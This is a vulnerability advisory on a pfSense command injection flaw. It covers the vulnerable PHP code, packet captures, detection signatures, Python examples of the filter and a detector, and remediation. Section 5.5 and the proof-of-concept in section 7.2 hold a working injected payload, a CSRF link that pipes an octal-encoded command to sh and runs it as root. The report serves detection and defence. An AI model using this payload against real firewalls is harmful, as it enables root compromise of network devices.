
TELUS Security Labs

Vulnerability Research Service

ESF pfSense status_rrd_graph_img.php Command Injection


Vulnerability Report - TSL20160419-04

Revision 1.0

Revision History
Revision 1.0 2016-05-02

Copyright 2004-2012 TELUS Security Labs

PROPRIETARY AND CONFIDENTIAL


ESF pfSense status_rrd_graph_img.php Command Injection Revision 1.0

Table of Contents
1. Identity of Problem
    1.1. Brief Description
    1.2. CVE Reference
    1.3. OSVDB Reference
    1.4. Vendor Advisory
    1.5. Discoverer Advisory
    1.6. Other Advisories
    1.7. Notes
    1.8. Vulnerability Classification and Severity
2. Affected Products
    2.1. Products Directly Affected by the Vulnerability
    2.2. Other Products Embedding the Vulnerable Product
3. Problem Location
    3.1. Program
    3.2. Function or Method
    3.3. Parameters
    3.4. Data Objects
4. Problem Mechanism
    4.1. Technical Mechanism
    4.2. Source Code Walkthrough
    4.3. Open Questions to Resolve
5. Triggering the Problem
    5.1. Prerequisites
    5.2. Triggering Conditions
    5.3. Protocol Flow Diagram
    5.4. Attack Delivery
    5.5. Packet Decodes
6. Attack Detection
    6.1. Remote Detection of Generic Attacks
    6.2. Remote Detection of Known Exploits
7. Exploit Reproduction
    7.1. Exploit Overview
    7.2. Exploit Code
8. Public Exploits
    8.1. Public Exploit [SA]
9. Remediation Details
10. Related Research
11. Credits


1. Identity of Problem
1.1. Brief Description
A Command Injection vulnerability has been reported in ESF pfSense. This vulnerability is due to
status_rrd_graph_img.php incorrectly validating the graph HTTP parameter.

A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the
status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF vulnerability and entice
an authenticated user to exploit this vulnerability. Successful exploitation will result in arbitrary command execution
with root privileges.

1.2. CVE Reference


This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

1.3. OSVDB Reference


This vulnerability has not been assigned an Open Source Vulnerability Database (OSVDB) identifier.

1.4. Vendor Advisory


The vendor, ESF, has released an advisory addressing this vulnerability with the unique identifier pfSense-
SA-16_01, dated 2016-04-01.

Reference: https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc

1.5. Discoverer Advisory


The discoverer, Francesco Oddo, has released an advisory addressing this vulnerability, dated 2016-04-15.

Reference: http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

1.6. Other Advisories


There are no other advisories available.

1.7. Notes
Not available.

1.8. Vulnerability Classification and Severity


1.8.1. TELUS Security Labs Classification
Vulnerability impact: COMMAND EXECUTION

Vulnerability type: INPUT VALIDATION ERROR

1.8.2. Common Weakness Enumeration (CWE) Classification


CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Reference: https://cwe.mitre.org/data/definitions/78.html


1.8.3. Severity
The severity classification of this vulnerability is high. This rating was determined through consideration of the
following factors:

Exploit code is publicly available.

This is a server compromise.

The vulnerability, if exploited, can lead to a root or system-level compromise.

The software affected by this vulnerability is significantly deployed.

The assets affected by this vulnerability are estimated to be of high value.

The attacker must have limited user privileges.

1.8.4. Common Vulnerability Scoring System (CVSS)


Base score is 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C), based on the following metrics:

Access vector is network.

Access complexity is medium.

Level of authentication required is single.

Impact of this vulnerability on data confidentiality is complete.

Impact of this vulnerability on data integrity is complete.

Impact of this vulnerability on data availability is complete.

Temporal score is 7.0 (E:F/RL:OF/RC:C), based on the following metrics:

The exploitability level of this vulnerability is functional.

The remediation level of this vulnerability is official fix.

The report confidence level of this vulnerability is confirmed.


2. Affected Products
2.1. Products Directly Affected by the Vulnerability
Electric Sheep Fencing pfSense prior to 2.3

2.2. Other Products Embedding the Vulnerable Product


Not applicable.


3. Problem Location
3.1. Program
The vulnerable program is status_rrd_graph_img.php.

3.2. Function or Method


The vulnerable function is responsible for sanitizing special characters used in Shell commands.

3.3. Parameters
The vulnerable parameter is the HTTP parameter graph.

3.4. Data Objects


Not available.


4. Problem Mechanism
4.1. Technical Mechanism
pfSense is an open source network firewall distribution based on the FreeBSD operating system. The distribution
creates a simple and intuitive WebGUI for configuring and managing a network firewall. Configuration is managed
either through the CLI or a web interface called the webConfigurator. The webConfigurator is a web application
capable of configuring and managing the firewall as well as other components of the pfSense distribution. All
interaction with the interface is performed via the HTTP protocol over port 80/TCP or securely over 443/TCP.

HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client
to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various
headers, an empty line, and an optional message body:
Request = Request-Line headers CRLF [message-body]
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Headers = *[Header]
Header = Field-Name ":" Field-Value CRLF

where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents
a space character. Parameters can be passed from the client to the server as name-value pairs in either the
Request-URI, or in the message-body, depending on the Method used and Content-Type header. For example, a
simple HTTP request passing a parameter named "param" with value "1", using the GET method might look like:
GET /my_webapp/mypaget.htm?param=1 HTTP/1.1
Host: www.myhost.com

A corresponding HTTP request using the POST method might look like:
POST /my_webapp/mypaget.htm HTTP/1.1
Host: www.myhost.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

param=1

If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs:
var1=value1&var2=value2...

A command injection vulnerability exists in ESF pfSense. This vulnerability is due to status_rrd_graph_img.php
incorrectly sanitizing the graph HTTP parameter. Specifically, this PHP script fails to check for the pipe
"|" (ASCII:0x7C) and grave accent "`" (ASCII:0x60) characters. The graph parameter is then used to construct a
shell command that is executed using the exec() function, enabling less privileged users to inject arbitrary OS
commands.

A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the
status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF vulnerability and entice
an authenticated user to exploit this vulnerability. Successful exploitation will result in arbitrary command execution
with root privileges.

4.2. Source Code Walkthrough


The following code snippet was taken from status_rrd_graph_img.php version 2.2.6. Comments added by TELUS
Security Labs have been highlighted.
$pgtitle = array(gettext("System"),gettext("RRD Graphs"),gettext("Image viewer"));

if ($_GET['database']) { //this param not exploitable due to future checks
    $curdatabase = basename($_GET['database']);
    $curdatabase = str_replace(array("<", ">", ";", "&", "'", '"'), "",
        htmlspecialchars_decode($curdatabase, ENT_QUOTES | ENT_HTML401));
} else {
    $curdatabase = "wan-traffic.rrd";
}

if ($_GET['style']) {
    $curstyle = $_GET['style'];
} else {
    $curstyle = "inverse";
}

/* this is used for temp name */
if ($_GET['graph']) { //no check for "|" or "`"
    $curgraph = str_replace(array("<", ">", ";", "&", "'", '"', '.', '/'), "",
        htmlspecialchars_decode($_GET['graph'], ENT_QUOTES | ENT_HTML401));
} else {
    $curgraph = "custom";
}

[...Truncated for readability...]

//vulnerable exec() below
//$curgraph is used to generate $graphcmd
if (file_exists("$rrdtmppath$curdatabase-$curgraph.png")) {
    if ((time() - filemtime("$rrdtmppath$curdatabase-$curgraph.png")) >= 15 ) {
        if ($data) {
            $_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
            $graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
            flush();
            usleep(500);
        }
    }
} else {
    if ($data) {
        $_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
        $graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
        flush();
        usleep(500);
    }
}
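
The graph filter from the walkthrough, modelled in Python as an added example (not pfSense code and not the vendor's fix): it shows that the two characters named in section 4.1 pass through the denylist, beside an allowlist check that rejects them. The entity decoding approximates htmlspecialchars_decode(); the allowlist alphabet, the helper names and the sample values are assumptions.

```python
import re

# Characters stripped from the graph parameter in the walkthrough above.
GRAPH_DENYLIST = ["<", ">", ";", "&", "'", '"', ".", "/"]

# Approximation of PHP htmlspecialchars_decode(..., ENT_QUOTES | ENT_HTML401):
# a single pass over the input that decodes only these entities.
_ENTITY_MAP = {"&lt;": "<", "&gt;": ">", "&quot;": '"', "&#039;": "'", "&amp;": "&"}
_ENTITY_RE = re.compile("|".join(re.escape(e) for e in _ENTITY_MAP))

# The two shell metacharacters the report names as unchecked.
UNCHECKED = ("|", "`")

# Assumed allowlist for graph names: letters, digits, "_" and "-", 1 to 64 chars.
_ALLOWED_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def denylist_filter(raw: str) -> str:
    """Model of the vulnerable filter: decode entities, then strip the denylist."""
    decoded = _ENTITY_RE.sub(lambda m: _ENTITY_MAP[m.group(0)], raw)
    for ch in GRAPH_DENYLIST:
        decoded = decoded.replace(ch, "")
    return decoded


def surviving_unchecked(raw: str) -> list:
    """Return the unchecked metacharacters still present after the denylist."""
    filtered = denylist_filter(raw)
    return [ch for ch in UNCHECKED if ch in filtered]


def allowlist_graph(raw: str, default: str = "custom") -> str:
    """Hardened form: accept the value only if every character is allowlisted."""
    return raw if _ALLOWED_RE.fullmatch(raw) else default


def compare(samples):
    """Return (input, denylist output, surviving characters, allowlist output)."""
    return [(s, denylist_filter(s), surviving_unchecked(s), allowlist_graph(s))
            for s in samples]


# Constructed sample values, not taken from any capture.
SAMPLES = ["custom", "traffic;x", "a.b/c", "&lt;b&gt;", "graph|x", "graph`x`"]

if __name__ == "__main__":
    for raw, filtered, survivors, allowed in compare(SAMPLES):
        print(f"{raw!r:14} denylist={filtered!r:12} "
              f"survivors={survivors} allowlist={allowed!r}")
```

A value that fails the allowlist is replaced by the default rather than cleaned, so nothing derived from rejected input reaches the string passed to exec().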

4.3. Open Questions to Resolve


Not available.


5. Triggering the Problem


5.1. Prerequisites
The server must have the vulnerable product installed and running.

The attacker must be able to entice a user to visit a malicious website.

5.2. Triggering Conditions


The attacker entices a user to send an HTTP request containing malicious shell commands in the affected parameter
to the affected URI. The vulnerability is triggered when the server processes this request.

5.3. Protocol Flow Diagram


5.3.1. Request/responses sequences, static or negotiated/ephemeral ports, etc
An authenticated target user is enticed to click on a hyperlink:
[ Attacker ] -----------------> [ Target User ]

The target user sends the crafted HTTP request to the target server:
[ Target User ] -----------------> [ Target Server ]

5.4. Attack Delivery


5.4.1. Application protocols
The following application protocols can be used to deliver an attack that exploits this vulnerability:

HTTP, over port 80/TCP


HTTPS, over port 80/TCP

5.4.2. IP protocols
Not available.

5.4.3. File based vectors


Not available.

5.4.4. Notes
Not applicable.

5.5. Packet Decodes


5.5.1. Normal traffic (baseline)
The following packet decode illustrates a normal packet exchange. Please refer to the attached file normal.pcap
for details.

A client sends a request:


Frame 4: 492 bytes on wire (3936 bits), 492 bytes captured (3936 bits)


Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: Vmware_bd:7f:60 (00:50:56:bd:7f:60)


Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.8.192 (172.16.8.192)
Transmission Control Protocol, Src Port: 49344 (49344), Dst Port: http (80), Seq: 1, Ack: 1, Len: 438
Hypertext Transfer Protocol
GET /status_rrd_graph_img.php HTTP/1.1\r\n
Host: 172.16.8.192\r\n
Connection: keep-alive\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75
Safari/537.36\r\n
Accept-Encoding: gzip, deflate, sdch\r\n
Accept-Language: en-US,en;q=0.8\r\n
Cookie: PHPSESSID=35edee32158c1a2a39b76b97ca8eaaa6\r\n
\r\n


The server responds:

Frame 6: 1514 bytes on wire (12112 bits), 1514 bytes captured (12112 bits)
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49344 (49344), Seq: 1, Ack: 439, Len: 1460
Hypertext Transfer Protocol
HTTP/1.1 200 OK\r\n
Expires: Sat, 30 Apr 2016 20:31:34 GMT\r\n
Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
Cache-Control: max-age=180000\r\n
Cache-Control: no-store, no-cache, must-revalidate\r\n
Cache-Control: post-check=0, pre-check=0\r\n
X-Frame-Options: SAMEORIGIN\r\n
Content-type: image/png\r\n
Last-Modified: Thu, 28 Apr 2016 18:31:35 GMT\r\n
Pragma: no-cache\r\n
Transfer-Encoding: chunked\r\n
Date: Thu, 28 Apr 2016 18:31:35 GMT\r\n
Server: lighttpd/1.4.38\r\n
\r\n
HTTP chunked response


5.5.2. Attack cases


The following packet decode illustrates an attack packet exchange. Please refer to the attached file attack.pcap
for details.

A client is enticed to visit a malicious website:

Frame 4: 444 bytes on wire (3552 bits), 444 bytes captured (3552 bits)
Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d)
Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.1.2 (172.16.1.2)
Transmission Control Protocol, Src Port: 49359 (49359), Dst Port: http (80), Seq: 1, Ack: 1, Len: 390
Hypertext Transfer Protocol
GET /~ssivakumaran/pfsense/poc.html HTTP/1.1\r\n
Host: 172.16.1.2\r\n
Connection: keep-alive\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75
Safari/537.36\r\n
Accept-Encoding: gzip, deflate, sdch\r\n
Accept-Language: en-US,en;q=0.8\r\n
\r\n


Malicious server responds:


Frame 6: 717 bytes on wire (5736 bits), 717 bytes captured (5736 bits)
Ethernet II, Src: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.1.2 (172.16.1.2), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49359 (49359), Seq: 1, Ack: 391, Len: 663
Hypertext Transfer Protocol
HTTP/1.1 200 OK\r\n
Date: Thu, 28 Apr 2016 18:47:12 GMT\r\n
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 mod_wsgi/3.4 Python/2.7.5\r\n
Last-Modified: Thu, 28 Apr 2016 18:31:18 GMT\r\n
ETag: "133-5318fbb6ba130"\r\n
Accept-Ranges: bytes\r\n
Content-Length: 307\r\n
Keep-Alive: timeout=5, max=100\r\n
Connection: Keep-Alive\r\n
Content-Type: text/html; charset=UTF-8\r\n
\r\n
Line-based text data: text/html
<html>\n
</html>\n


The client sends a crafted request to the server:


Frame 11: 680 bytes on wire (5440 bits), 680 bytes captured (5440 bits)
Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: Vmware_bd:7f:60 (00:50:56:bd:7f:60)
Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.8.192 (172.16.8.192)
Transmission Control Protocol, Src Port: 49360 (49360), Dst Port: http (80), Seq: 1, Ack: 1, Len: 626
Hypertext Transfer Protocol
GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\164\\157\\165\\143\\150\\040\\057\\164\\155\\160\\057\\164\\145\\163\\164|sh|echo HTTP/1.1\r\n
Host: 172.16.8.192\r\n
Connection: keep-alive\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75
Safari/537.36\r\n
Referer: http://172.16.1.2/~ssivakumaran/pfsense/poc.html\r\n
Accept-Encoding: gzip, deflate, sdch\r\n
Accept-Language: en-US,en;q=0.8\r\n
Cookie: PHPSESSID=9ef619062013b1690743c6265f32a760\r\n
\r\n


The server responds:

Frame 13: 667 bytes on wire (5336 bits), 667 bytes captured (5336 bits)
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49360 (49360), Seq: 1, Ack: 627, Len: 613
Hypertext Transfer Protocol
HTTP/1.1 200 OK\r\n
Expires: Sat, 30 Apr 2016 20:48:52 GMT\r\n
Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
Cache-Control: max-age=180000\r\n
Cache-Control: no-store, no-cache, must-revalidate\r\n
Cache-Control: post-check=0, pre-check=0\r\n
X-Frame-Options: SAMEORIGIN\r\n
Content-type: image/png\r\n
Last-Modified: Thu, 28 Apr 2016 18:48:52 GMT\r\n
Pragma: no-cache\r\n
Transfer-Encoding: chunked\r\n
Date: Thu, 28 Apr 2016 18:48:52 GMT\r\n
Server: lighttpd/1.4.38\r\n
\r\n
HTTP chunked response
Media Type
Media Type: image/png (175 bytes)

Frame (667 bytes):


0000 00 50 56 bd e4 13 00 50 56 bd 7f 60 08 00 45 00 .PV....PV..`..E.
0010 02 8d 61 92 40 00 40 06 6d 2a ac 10 08 c0 ac 10 ..a.@.@.m*......
0020 08 ce 00 50 c0 d0 16 f6 a6 e9 b4 59 68 cd 50 18 ...P.......Yh.P.
0030 02 01 42 dc 00 00 48 54 54 50 2f 31 2e 31 20 32 ..B...HTTP/1.1 2
0040 30 30 20 4f 4b 0d 0a 45 78 70 69 72 65 73 3a 20 00 OK..Expires:
0050 53 61 74 2c 20 33 30 20 41 70 72 20 32 30 31 36 Sat, 30 Apr 2016
0060 20 32 30 3a 34 38 3a 35 32 20 47 4d 54 0d 0a 45 20:48:52 GMT..E
0070 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 xpires: Mon, 26
0080 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 Jul 1997 05:00:0
0090 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 0 GMT..Cache-Con
00a0 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 38 trol: max-age=18
00b0 30 30 30 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 0000..Cache-Cont
00c0 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e rol: no-store, n
00d0 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 o-cache, must-re
00e0 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d validate..Cache-
00f0 43 6f 6e 74 72 6f 6c 3a 20 70 6f 73 74 2d 63 68 Control: post-ch
0100 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b eck=0, pre-check
0110 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 =0..X-Frame-Opti
0120 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d ons: SAMEORIGIN.
0130 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 69 .Content-type: i
0140 6d 61 67 65 2f 70 6e 67 0d 0a 4c 61 73 74 2d 4d mage/png..Last-M
0150 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 38 odified: Thu, 28
0160 20 41 70 72 20 32 30 31 36 20 31 38 3a 34 38 3a Apr 2016 18:48:
0170 35 32 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 52 GMT..Pragma:
0180 6e 6f 2d 63 61 63 68 65 0d 0a 54 72 61 6e 73 66 no-cache..Transf
0190 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 er-Encoding: chu
01a0 6e 6b 65 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c nked..Date: Thu,
01b0 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 3a 28 Apr 2016 18:
01c0 34 38 3a 35 32 20 47 4d 54 0d 0a 53 65 72 76 65 48:52 GMT..Serve
01d0 72 3a 20 6c 69 67 68 74 74 70 64 2f 31 2e 34 2e r: lighttpd/1.4.
[...Truncated for readability...]
0260 20 69 6e 20 2f 75 73 72 2f 6c 6f 63 61 6c 2f 77 in /usr/local/w
0270 77 77 2f 73 74 61 74 75 73 5f 72 72 64 5f 67 72 ww/status_rrd_gr
0280 61 70 68 5f 69 6d 67 2e 70 68 70 20 6f 6e 20 6c aph_img.php on l
0290 69 6e 65 20 31 32 37 32 0a 0d 0a ine 1272...

6. Attack Detection
6.1. Remote Detection of Generic Attacks
pfSense enforces HTTPS by default. In order to detect a generic attack using this vulnerability, the detection
device must decrypt the HTTPS packets and monitor the HTTP traffic on the ports mentioned in the section entitled
"Attack Delivery".

HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client
to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various
headers, an empty line, and an optional message body:
Request = Request-Line headers CRLF [message-body]
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Headers = *[Header]
Header = Field-Name ":" Field-Value CRLF

where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents
a space character. Parameters can be passed from the client to the server as name-value pairs in either the
Request-URI or in the message-body depending on the Method used and Content-Type header. For example, a
simple HTTP request passing a parameter named "param" with value "1", using the GET method might look like:
GET /my_webapp/mypaget.htm?param=1 HTTP/1.1
Host: www.myhost.com

A corresponding HTTP request using the POST method might look like:
POST /my_webapp/mypaget.htm HTTP/1.1
Host: www.myhost.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

param=1

If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs:
var1=value1&var2=value2...

The detection device must look for HTTP requests to the following URI:
/status_rrd_graph_img.php

If a request to this URI is found, the detection device must analyze the value assigned to the request parameter
graph. If the value contains a pipe character "|" (or its case-insensitive URL-encoding, %7C), or the grave accent
"`" character (or in URL-encoded form, %60), then an attack exploiting this vulnerability is likely underway.

Note: All string matching described above must be done in a case-sensitive manner.

6.2. Remote Detection of Known Exploits


The generic detection described above is capable of detecting all known exploits for this vulnerability; however,
if the detection device needs to single out uses of the public exploit provided by Francesco Oddo, it can do
so by searching for the following strings:

String 1:
\\145\\143\\150\\157

String 2:
\\160\\150\\160

String 3:
|

String 4:
status_rrd_graph_img.php

String 5:
graph=

If all of these strings are detected then an attack using the public exploit is likely underway.
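
The checks from sections 6.1 and 6.2, written out as an added example that is not part of the original report. It assumes the traffic has already been decrypted and reassembled into raw request bytes; the function names and sample requests are hypothetical, and parameter values are URL-decoded once.

```python
from urllib.parse import parse_qsl, urlsplit

TARGET_PATH = "/status_rrd_graph_img.php"  # URI named in section 6.1
SHELL_META = ("|", "`")                    # decoded forms of %7C and %60
# Section 6.2 strings; rb"\\" is two literal backslash bytes, as in the capture.
PUBLIC_EXPLOIT_STRINGS = (rb"\\145\\143\\150\\157", rb"\\160\\150\\160",
                          b"|", b"status_rrd_graph_img.php", b"graph=")

def graph_values(raw: bytes) -> list:
    """URL-decoded values of every 'graph' parameter sent to the target URI."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, _, rest = lines[0].partition(" ")
    target, _, _version = rest.rpartition(" ")
    url = urlsplit(target)
    if url.path != TARGET_PATH:            # case-sensitive match, per the note
        return []
    pairs = parse_qsl(url.query, keep_blank_values=True)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip().lower()
    form = headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
    if method == "POST" and form:          # parameters may travel in the body
        pairs += parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    return [value for name, value in pairs if name == "graph"]

def is_generic_attack(raw: bytes) -> bool:
    """Section 6.1: pipe or grave accent in 'graph', raw or percent-encoded."""
    return any(ch in value for value in graph_values(raw) for ch in SHELL_META)

def is_public_exploit(raw: bytes) -> bool:
    """Section 6.2: all five strings present in the undecoded request bytes."""
    return all(s in raw for s in PUBLIC_EXPLOIT_STRINGS)

# Constructed sample requests (not taken from the capture).
SAMPLES = {
    "benign": b"GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file HTTP/1.1\r\nHost: fw.example\r\n\r\n",
    "encoded_pipe": b"GET /status_rrd_graph_img.php?graph=file%7cx HTTP/1.1\r\nHost: fw.example\r\n\r\n",
    "post_backtick": b"POST /status_rrd_graph_img.php HTTP/1.1\r\nHost: fw.example\r\n"
                     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 11\r\n\r\ngraph=a%60b",
    "other_uri": b"GET /index.php?graph=a|b HTTP/1.1\r\nHost: fw.example\r\n\r\n",
    "signature": rb"GET /status_rrd_graph_img.php?graph=x|\\145\\143\\150\\157\\160\\150\\160 HTTP/1.1",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, is_generic_attack(raw), is_public_exploit(raw))
```

The generic check runs on decoded parameter values, so `%7C` and `%7c` are both caught, while the known-exploit check matches the five strings against the undecoded bytes exactly as the report lists them.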

7. Exploit Reproduction
7.1. Exploit Overview
TELUS Security Labs has provided a proof-of-concept poc.html to illustrate the impact of this vulnerability. To
trigger the vulnerability, click the hyperlink embedded within the HTML. Upon processing, a file named "test" should
be created in the "/tmp/" directory of pfSense.

Note that before this POC is used the "<target-ip>" string should be replaced with the IP address of the machine
running pfSense. The user clicking on the hyperlink should be an authenticated pfSense user.

7.2. Exploit Code


<html>
<head>
<title>TELUS Security Labs PoC</title>
</head>
<body>
<a href="http://<target-ip>/status_rrd_graph_img.php?
database=-throughput.rrd&graph=file|printf%20
\\164\\157\\165\\143\\150\\040\\057\\164\\155
\\160\\057\\164\\145\\163\\164|sh|echo">
Click here for PoC</a>
</body>
</html>

8. Public Exploits
8.1. Public Exploit [SA]
8.1.1. Exploit overview
The discoverer has published a proof-of-concept exploit demonstrating this vulnerability. The proof of concept has
been made available via:

http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

9. Remediation Details
The risks posed by this vulnerability can be mitigated or eliminated by:

Applying the vendor-provided patch to eliminate the vulnerability.

Filtering attack traffic using information provided in the "Attack Detection" section.

Not visiting untrusted websites.

The vendor has released the following advisory regarding this vulnerability:

https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc

10. Related Research


Not available.

11. Credits
Principal contributors, researchers, and reviewers for this report include the following members of the TELUS
Security Labs Research Team:

Vincent Lee
Sivathmican Sivakumaran
